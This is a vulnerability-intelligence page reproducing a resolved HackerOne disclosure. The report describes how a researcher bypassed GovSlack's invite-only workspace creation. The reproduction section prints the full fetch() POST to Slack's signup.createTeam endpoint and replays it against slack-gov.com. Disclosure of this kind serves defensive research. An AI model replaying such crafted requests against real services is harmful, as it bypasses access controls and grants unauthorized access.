Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Unauthorized access to GovSlack

Medium
S
Slack
Submitted None

Team Summary

Official summary from Slack

Users were able to create a new Workspace within the GovSlack product. This was possible by saving the HTTP POST request to the target /api/signup.createTeam API endpoint when creating a Slack Workspace on slack.com then using the cookies from a failed GovSlack sign-in attempt to call the endpoint, resulting in a GovSlack instance being created for the user. This behavior bypassed security controls which normally require a user to be invited to an existing GovSlack instance or contact Slack to create a new GovSlack instance, and allows the user to access features only available with GovSlack. Slack’s internal team resolved this issue on December 13, 2022, blocking Govslack in /api/signup.createTeam from future use and confirmed that no data from existing workspaces was exposed as a result of this issue.

Actions:
View on HackerOne
Reported by violet

Vulnerability Details

Technical details and impact analysis

Improper Authentication - Generic
Head to slack.com (I use firefox), login as a user that hasn't used slack, create a workspace, copy the payload as fetch. In my case: ``` await fetch("https://slack.com/api/signup.createTeam?_x_id=noversion-1667355054.372", { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "multipart/form-data; boundary=---------------------------34111059701841183173198228768", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin" }, "referrer": "https://slack.com/get-started", "body": "-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"email_misc\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"tz\"\r\n\r\nAmerica/Los_Angeles\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"locale\"\r\n\r\nen-US\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"last_tos_acknowledged\"\r\n\r\ntos_mar2018\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"login\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768\r\nContent-Disposition: form-data; name=\"in_setup_experiment\"\r\n\r\ntrue\r\n-----------------------------34111059701841183173198228768--\r\n", "method": "POST", "mode": "cors" }); ``` Login to slack-gov.com, where the option to create a workspace for new users is disabled. Send this same fetch request, replacing slack.com with slack-gov.com. In my case, the workspace created is viomck.slack-gov.com. ## Impact Unauthorized access to GovSlack.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1500.00

Submitted

Weakness

Improper Authentication - Generic